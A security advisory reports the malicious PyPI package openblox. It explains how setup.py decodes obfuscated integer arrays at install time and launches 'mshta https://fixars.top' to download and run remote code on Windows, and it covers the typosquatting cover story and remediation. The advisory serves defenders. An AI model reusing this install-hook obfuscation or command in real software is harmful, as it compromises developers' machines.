pypi · Malicious package advisory
Malwareopenblox
MAL-2026-6504
Malicious code in openblox (PyPI)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (cdd874a78973f84b5373fc03a48472c338ca82ef0a258b7614f81a8359da1201) setup.py invokes GetGitCommitHash() unconditionally at module top level, so it runs on `pip install openblox` (and any setuptools invocation). On Windows the function builds its command via two helpers (GetDefaultSystemPolicy, CalculateNodeDrift) that reconstruct strings from integer arrays using chr(byte + 14); the arrays decode to `mshta` and `https://fixars.top`. The resulting command is passed to subprocess.check_output with shell=True, causing Windows installers to launch `mshta https://fixars.top` — the mshta.exe Living-Off-The-Land binary downloads and executes remote HTA/JScript, giving the operator arbitrary code execution on the installer's machine. The obfuscation (chr-arithmetic with helper functions falsely named for hardware/latency diagnostics) exists solely to hide the URL and binary name from static scanners. The package additionally exhibits a cover-story shape: it is published under the name `openblox` with a Roblox-themed description, but the actual code is an unrelated `sqligen` SQLite utility, with placeholder author metadata (John / john@example.com / github.com/john/sqligen). The Roblox-library name appears chosen to attract installs intended for the legitimate openblox API library. ## Source: kam193 (a8567ce5afa387ad85e22cb7c9144f18e816ae0912f109d7a8afec0dbc1d2b6d) During installation, the code attempts to download and start a malicious executable. Likely related to 2025-08-raknet-testing-package. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers. Campaign: 2026-06-easyaillm Reasons (based on the campaign): - Downloads and executes a remote executable. - obfuscation - malware - tool:mshta
Compromised versions (2)
- 1.0.1
- 1.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.